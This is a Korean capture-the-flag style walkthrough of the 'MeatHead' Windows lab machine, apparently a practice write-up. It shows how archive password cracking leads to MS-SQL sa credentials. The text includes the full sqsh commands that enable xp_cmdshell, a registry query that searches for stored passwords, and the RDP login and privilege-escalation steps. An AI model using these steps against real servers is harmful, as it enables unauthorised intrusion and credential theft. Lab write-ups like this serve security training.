40. MeatHead (HARD) - Windows (rar, rar2john, sqsh, xp_cmdshell, 레지스트리 검색)*
1. Enumeration
: Nmap
data:image/s3,"s3://crabby-images/d3816/d3816e4df91f4d0b32da8f9b7a906cec38348bdb" alt=""
> 80 : plantronics
> hostname : meathead
: smb enum
data:image/s3,"s3://crabby-images/594a1/594a1cb92a503f13acbef16b9515842752c451b2" alt=""
: web enum
data:image/s3,"s3://crabby-images/9918d/9918d4481706bb59f38326bdb0d811a13a6bfab2" alt=""
data:image/s3,"s3://crabby-images/28da1/28da11fb00cedbfaee661057461e19b61a9f83f1" alt=""
> 로그인을 시도해 보면
data:image/s3,"s3://crabby-images/7b1ca/7b1caa59e986f1c799e400f7c761d8155b358813" alt=""
: ftp enum
data:image/s3,"s3://crabby-images/2c7c7/2c7c7e97db2e90b872bcc2da9ea627102c5b4ad0" alt=""
> 내려받은 후 살펴보면
data:image/s3,"s3://crabby-images/7e5fd/7e5fd84bbe10f2845fd69ba613d8ddaaecd821c3" alt=""
data:image/s3,"s3://crabby-images/43d3a/43d3a3be730a73fb457ab5a0c72e7c900b156a15" alt=""
> 비번 걸려있음
2. Exploitation
: 크랙 작업
data:image/s3,"s3://crabby-images/ac97b/ac97b658e09b03ad9af2471a38b2eaa83f8f93aa" alt=""
> 크랙 가능한 형태로 만들어주고 돌려주면
data:image/s3,"s3://crabby-images/95d73/95d7303b87c4788bf7f5bd83cca0abdb2299d820" alt=""
> 성공!
비번을 사용해 unrar을 시도하면
data:image/s3,"s3://crabby-images/9f336/9f33600f7e6bf33e98a3ac14ead287578715724a" alt=""
> 백업 파일이 있고, 열어보면
data:image/s3,"s3://crabby-images/0b94b/0b94b0e306916314aaf8fb35094c39f9852652b5" alt=""
> ms-sql creds 확인!
: SQShell(SQSH)을 활용한 시스템 커맨드 실행
방법 1) 바로 접속
data:image/s3,"s3://crabby-images/30cd6/30cd67486e7545f7982e0f6e37a9642d30277381" alt=""
방법 2) Config 설정 후 sqshrc 생성해 접속
: config 설정
data:image/s3,"s3://crabby-images/80182/801829f4b5e0c419b0b3320c9778e2b73ad6b7d5" alt=""
data:image/s3,"s3://crabby-images/73f81/73f8134175548d95cea0a38040767f614d9c56af" alt=""
: .sqshrc 생성
data:image/s3,"s3://crabby-images/6080d/6080d2356e5767a481f8cca011c7273c80abb823" alt=""
: 접속 시도해 보면
data:image/s3,"s3://crabby-images/18019/180196e6036a3fdbafdc9201345928fe373b0d42" alt=""
성공!
어떤 방법이든 상관없음!
#sqsh OS 커맨드 실행
(sa 유저이기 때문에 xp_cmdshell을 통한
OS 커맨드 실행이 가능한 상황!)
1) 버전 확인
root@takudaddy:~# sqsh -S Meathead
sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
1> SELECT @@VERSION;
2> go
: Microsoft SQL Server 2017 (RTM) - 14.0.1000.169 (X64)
Aug 22 2017 17:04:49
Copyright (C) 2017 Microsoft Corporation
Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
(1 row affected)
1>
2) xp_cmdshell 활성화
1> EXEC sp_configure 'show advanced option', '1';
2> go
Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
(return status = 0)
1> RECONFIGURE WITH OVERRIDE;
2> go
1> EXEC sp_configure 'xp_cmdshell', 1;
2> go
Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
(return status = 0)
1> RECONFIGURE;
2> go
1> EXEC sp_configure 'show advanced option';
2> go
name: show advanced options
minimum: 0
maximum: 1
config_value: 1
run_value: 1
(return status = 0)
1>
: 활성화 후 커맨드 실행 테스트
data:image/s3,"s3://crabby-images/86b78/86b782c893c567432fb9f8be3e619988e2c67627" alt=""
> 정상 작동!
3) Local Enum
: systeminfo
data:image/s3,"s3://crabby-images/54bfa/54bfa6802c572823d4598b3af8571dfe53ea3f20" alt=""
: 사용자 검색 - net user
data:image/s3,"s3://crabby-images/032c6/032c6a9adf9a0fbe6cb82932a2c5b7df430c9a8b" alt=""
> jane
: 암호 검색 - reg query
레지스트리에서 특정 검색어 (pass) 검색
reg query HKLM /f pass /t REG_SZ /s
> 내용이 너무 많아 검색어 변경 후 재요청
data:image/s3,"s3://crabby-images/bb95c/bb95ce00f2e3d0e4554810b02e3e6b8438ac03a6" alt=""
> Twil*************234
: RDP 접속
data:image/s3,"s3://crabby-images/0266e/0266e5a81b1632f5080cc7190ca0280f6c7bc325" alt=""
> 침투 완료!
3. Privilege Escalation
Nmap 결과에서
80이 plantronics 임을 확인했고
관련 exploit을 찾으면 PoC 확인이
가능하고
data:image/s3,"s3://crabby-images/ce63a/ce63a33654378ec60931b19422524c1fb9a9bc9f" alt=""
내용대로 진행하면
data:image/s3,"s3://crabby-images/0cb7f/0cb7f47d342a8e3ecd898c9b155b5e94bf4df286" alt=""
data:image/s3,"s3://crabby-images/b145a/b145adc5153ad6a3d3f9f505667b8641a7911e49" alt=""
끝